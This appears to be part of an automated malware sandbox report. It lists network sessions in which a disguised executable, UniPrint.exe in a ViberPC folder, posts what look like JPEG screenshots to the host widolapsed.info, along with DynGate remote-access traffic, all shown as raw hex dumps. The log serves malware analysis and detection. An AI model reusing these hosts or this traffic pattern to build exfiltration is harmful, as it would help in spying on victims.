                                                                                                      Sep 15, 2021 13:45:21.789140940 CEST1062OUTData Raw: 33
                                                                                                      Data Ascii: 3
                                                                                                      Sep 15, 2021 13:45:21.823175907 CEST1062INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-length: 0
                                                                                                      Sep 15, 2021 13:45:21.865972042 CEST1063OUTGET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: 188.172.198.151
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.899944067 CEST1063INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 500000
                                                                                                      Data Raw: 17 24 11 04 00 5f a6 01 2f
                                                                                                      Data Ascii: $_/
                                                                                                      Sep 15, 2021 13:45:21.936281919 CEST1063INData Raw: 17 24 0a 20 00 5f a6 01 2f 00 00 00 00 73 00 00 00 01 00 00 00 14 80 00 00 1e 3f 81 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: $ _/s?
                                                                                                      Sep 15, 2021 13:45:21.936321974 CEST1063INData Raw: 17 24 2e 38 00 23 05 01 04 00 00 00 02 00 00 00 02 04 00 00 00 a0 75 4e 17 03 04 00 00 00 bf 4c 02 5e 04 10 00 00 00 04 00 00 00 a0 75 4e 17 04 00 00 00 bf 4c 02 5e fe 01 00 00 00 03
                                                                                                      Data Ascii: $.8#uNL^uNL^
                                                                                                      Sep 15, 2021 13:45:22.327691078 CEST1065INData Raw: 17 24 2e cf 04 26 14 01 04 00 00 00 01 00 00 00 02 04 00 00 00 00 00 00 00 03 04 00 00 00 00 00 00 00 08 02 00 00 00 00 00 14 02 00 00 00 00 00 15 01 00 00 00 00 16 02 00 00 00 00 00 17 04 00 00 00 03 00 00 00 18 02 00 00 00 00 00 19 01 00 00 00
                                                                                                      Data Ascii: $.&0<html><head><HTA:APPLICATION ID="oHTA" ICON="http://www.teamviewer.com/fa
                                                                                                      Sep 15, 2021 13:45:22.327735901 CEST1066INData Raw: 17 24 2e d2 01 26 15 01 04 00 00 00 02 00 00 00 02 04 00 00 00 00 00 00 00 03 04 00 00 00 00 00 00 00 08 0c 01 00 00 a5 63 9a 7d d1 30 fc 30 c8 30 ca 30 fc 30 6e 30 66 8a 28 75 e9 30 a4 30 bb 30 f3 30 b9 30 4c 30 31 59 b9 52 57 30 7e 30 57 30 5f
                                                                                                      Data Ascii: $.&c}00000n0f(u00000L01YRW0~0W0_00c}00000L0FU(uvvg0TeamViewer0O(uY004XT0J0[i0+T0c}00000n0D0Z00K0L0gRj0TeamViewer000000@bcW0f0D00_L0B0
                                                                                                      Sep 15, 2021 13:45:22.327797890 CEST1067INData Raw: 17 24 2e 22 03 26 15 01 04 00 00 00 03 00 00 00 02 04 00 00 00 00 00 00 00 03 04 00 00 00 00 00 00 00 08 a4 00 00 00 46 55 28 75 7f 4f 28 75 6e 30 91 75 44 30 5c 00 6e 00 5c 00 6e 00 53 30 6e 30 bd 30 d5 30 c8 30 a6 30 a7 30 a2 30 6f 30 46 55 28
                                                                                                      Data Ascii: $."&FU(uO(un0uD0\n\nS0n0000000o0FU(utXg0O(uU00f0D000F0g0Y00!qe00000o0PNvj0(ug0W0K0O(ug0M0~0[000\n\n000k0_c0f0T0)R(uO0`0U0D00FU(uO(u
                                                                                                      Sep 15, 2021 13:45:22.328299046 CEST1068INData Raw: 17 24 2e 5a 03 26 15 01 04 00 00 00 04 00 00 00 02 04 00 00 00 00 00 00 00 03 04 00 00 00 00 00 00 00 08 de 00 00 00 46 55 28 75 7f 4f 28 75 4c 30 1c 69 fa 51 55 30 8c 30 7e 30 57 30 5f 30 5c 00 6e 00 5c 00 6e 00 53 30 6e 30 bd 30 d5 30 c8 30 a6
                                                                                                      Data Ascii: $.Z&FU(uO(uL0iQU00~0W0_0\n\nS0n0000000o0FU(utXg0O(uU00f0D000F0g0Y00!qe00000o0PNvj0(ug0W0K0O(ug0M0~0[000\n\nS0n000000o05R_k0B}NW0~0Y00s0}o0S_>yn00000000
                                                                                                      Sep 15, 2021 13:45:47.900021076 CEST2462INData Raw: 17 24 1b 00 00
                                                                                                      Data Ascii: $
                                                                                                      Sep 15, 2021 13:46:12.900072098 CEST7189INData Raw: 17 24 1b 00 00
                                                                                                      Data Ascii: $
                                                                                                      Sep 15, 2021 13:46:37.900084972 CEST8463INData Raw: 17 24 1b 00 00
                                                                                                      Data Ascii: $
                                                                                                      Sep 15, 2021 13:47:02.910207987 CEST9324INData Raw: 17 24 1b 00 00
                                                                                                      Data Ascii: $


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.34975745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.34975845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.34976045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      8192.168.2.34976145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      9192.168.2.34976245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.34975245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:23 UTC0OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76431
                                                                                                      Content-Type: multipart/form-data; boundary=--------3259937207
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:23 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 32 35 39 39 33 37 32 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3259937207Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:23 UTC0OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ab d1 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:45:23 UTC0OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:23 UTC16OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:23 UTC32OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:23 UTC48OUTData Raw: db 74 6c 7d 2b 3a 8a a5 87 a6 ba 19 3c 5d 67 d4 b6 da 85 cb fd e9 5b f3 a6 f9 d2 37 57 27 f1 aa f4 e5 ab f6 71 5b 22 55 69 bd d9 2e e2 7a 93 4b 9a 68 a5 a5 62 d4 9b 1d 4e 14 dc d2 e6 91 69 8e cd 38 1a 8e 9e 29 34 52 63 e9 45 34 52 d4 9a 26 3a 9c 29 80 d3 b2 29 14 98 ec d3 85 33 34 b9 35 2d 16 99 25 14 d0 4d 2f d4 d2 68 a4 c7 8a 5c 8a 8f 7a 0e ac 3f 3a 63 5c c0 9d 5c 1a 5c ac 39 d2 ea 59 07 e5 3f 4a e3 3c 51 ff 00 1f b1 7f d7 21 5d 31 d4 a0 5c 81 93 5c cf 89 4e 6e e1 3f f4 c8 7f 3a a8 c5 ad c1 4d 4a 5a 1c 5d 14 56 e5 e1 48 7c 2f a7 18 e5 d3 e3 79 a1 72 f1 bd a8 69 a5 3e 6b 0c 87 d8 71 80 3f bc 3a 57 03 76 b1 eb a5 73 12 94 33 2a b0 56 20 30 c3 00 7a f7 ae ab 54 82 de 4f 14 4d 6a 4d 84 b6 f6 e6 69 05 b5 b5 b7 94 c3 62 16 08 ec 11 73 9c 63 82 7b d5 5b 65 7d
                                                                                                      Data Ascii: tl}+:<]g[7W'q["Ui.zKhbNi8)4RcE4R&:))345-%M/h\z?:c\\\9Y?J<Q!]1\\Nn?:MJZ]VH|/yri>kq?:Wvs3*V 0zTOMjMibsc{[e}
                                                                                                      2021-09-15 11:45:23 UTC64OUTData Raw: 2e 68 cd 25 14 00 ec d1 4d a5 a2 e1 61 68 cd 26 69 33 45 c2 c3 b3 46 69 b9 a2 8b 85 87 e6 8c d3 68 cd 3b 8a c3 b3 49 9a 6d 2e 69 5c 76 17 34 b9 a6 d2 66 8b 85 87 51 9a 4c d1 45 c2 c3 b3 48 69 28 cd 3b 85 82 8a 4a 29 00 b4 66 92 8a 02 c2 e6 8a 6e 68 cd 2b 8e c2 d1 9a 6e 68 cd 17 0b 0b 9a 33 49 9a 4c d2 b8 ec 3b 34 94 99 a3 34 5c 2c 2d 14 99 a3 34 80 5c d2 52 66 90 9a 2e 3b 0b 9a 4c d2 51 4a e3 b0 b4 94 52 50 31 4d 25 14 52 01 69 28 a2 80 0a 28 a2 80 1c 0d 19 a6 e6 8c d3 b8 58 5c d1 49 49 48 2c 2d 06 8c d2 52 18 50 28 a2 80 16 8a 29 29 88 82 8a 29 6b 23 50 a2 ad e9 9a 65 ee ab 70 f0 69 f0 79 d2 22 17 65 dc 17 0b 90 33 c9 1e a2 b4 bf e1 0e f1 01 ff 00 98 7f fe 46 8f ff 00 8a a8 95 58 45 da 4d 22 94 64 f6 46 15 15 bd ff 00 08 67 88 4f fc c3 ff 00 f2 34 7f fc
                                                                                                      Data Ascii: .h%Mah&i3EFih;Im.i\v4fQLEHi(;J)fnh+nh3IL;44\,-4\Rf.;LQJRP1M%Ri((X\IIH,-RP()))k#Pepiy"e3FXEM"dFgO4
                                                                                                      2021-09-15 11:45:23 UTC74OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 32 35 39 39 33 37 32 30 37 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3259937207--
                                                                                                      2021-09-15 11:45:23 UTC74INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:23 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=de80600dc92f141ee3da10fe6bf05f4a0734f2904d555e3f118b82595cba32d2; expires=Thu, 15-Sep-2022 11:45:23 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:23 UTC75INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.34975345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:25 UTC75OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76426
                                                                                                      Content-Type: multipart/form-data; boundary=--------974736809
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:25 UTC75OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 37 34 37 33 36 38 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------974736809Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:25 UTC75OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 b4 d1 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:45:25 UTC75OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:25 UTC91OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:25 UTC107OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:25 UTC123OUTData Raw: c2 7f e9 90 fe 75 51 8b 5b 82 9a 94 b4 38 ba 28 ad cb c2 90 f8 5f 4e 31 cb a7 c6 f3 42 e5 e3 7b 50 d3 4a 7c d6 19 0f b0 e3 00 7f 78 74 ae 06 ed 63 d7 4a e6 25 28 66 55 60 ac 40 61 86 00 f5 ef 5d 56 a9 05 bc 9e 28 9a d4 9b 09 6d ed cc d2 0b 6b 6b 6f 29 86 c4 2c 11 d8 22 e7 38 c7 04 f7 aa b6 ca fa 84 76 92 5c 2e 98 f1 de 19 ad d3 ec f6 c2 37 8e 52 80 a8 38 45 07 07 6e 08 cf 53 cd 47 b5 56 b9 5e cd dc e7 d5 99 18 32 92 ac 39 04 1e 45 4d 77 7b 75 7c c8 d7 97 12 4e d1 ae c5 69 1b 71 0b 9c e3 27 eb 5d 02 d9 5a c7 6f 6d 37 d9 e2 27 4d 85 cd e0 65 07 7b 98 c4 88 1b d7 e7 62 bf 85 53 b8 89 13 c3 8b aa 0b 44 13 ce 89 03 2e c5 da 8b 92 3c d0 3b 16 db b7 38 ea 18 e7 91 4f da 2b d8 14 19 89 45 74 17 90 5b ae af e2 65 58 21 11 c1 13 18 80 41 84 3e 6a 01 b7 d3 82 47 1e
                                                                                                      Data Ascii: uQ[8(_N1B{PJ|xtcJ%(fU`@a]V(mkko),"8v\.7R8EnSGV^29EMw{u|Niq']Zom7'Me{bSD.<;8O+Et[eX!A>jG
                                                                                                      2021-09-15 11:45:25 UTC139OUTData Raw: 45 36 96 8b 85 85 a3 34 99 a4 cd 17 0b 0e cd 19 a6 e6 8a 2e 16 1f 9a 33 4d a3 34 ee 2b 0e cd 26 69 b4 b9 a5 71 d8 5c d2 e6 9b 49 9a 2e 16 1d 46 69 33 45 17 0b 0e cd 21 a4 a3 34 ee 16 0a 29 28 a4 02 d1 9a 4a 28 0b 0b 9a 29 b9 a3 34 ae 3b 0b 46 69 b9 a3 34 5c 2c 2e 68 cd 26 69 33 4a e3 b0 ec d2 52 66 8c d1 70 b0 b4 52 66 8c d2 01 73 49 49 9a 42 68 b8 ec 2e 69 33 49 45 2b 8e c2 d2 51 49 40 c5 34 94 51 48 05 a4 a2 8a 00 28 a2 8a 00 70 34 66 9b 9a 33 4e e1 61 73 45 25 25 20 b0 b4 1a 33 49 48 61 40 a2 8a 00 5a 28 a4 a6 22 0a 28 a5 ac 8d 42 8a b7 a6 69 97 ba ad c3 c1 a7 c1 e7 48 88 5d 97 70 5c 2e 40 cf 24 7a 8a d2 ff 00 84 3b c4 07 fe 61 ff 00 f9 1a 3f fe 2a a2 55 61 17 69 34 8a 51 93 d9 18 54 56 f7 fc 21 9e 21 3f f3 0f ff 00 c8 d1 ff 00 f1 55 05 ff 00 86 35 ad
                                                                                                      Data Ascii: E64.3M4+&iq\I.Fi3E!4)(J()4;Fi4\,.h&i3JRfpRfsIIBh.i3IE+QI@4QH(p4f3NasE%% 3IHa@Z("(BiH]p\.@$z;a?*Uai4QTV!!?U5
                                                                                                      2021-09-15 11:45:25 UTC150OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 37 34 37 33 36 38 30 39 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------974736809--
                                                                                                      2021-09-15 11:45:26 UTC150INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:25 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=bded72cc5c7f2e575f605fb39a97e546a831d014bb37e8828c9704ca34d93734; expires=Thu, 15-Sep-2022 11:45:25 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:26 UTC150INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      10192.168.2.34976345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:35 UTC797OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81307
                                                                                                      Content-Type: multipart/form-data; boundary=--------2963325791
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:35 UTC797OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 36 33 33 32 35 37 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2963325791Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
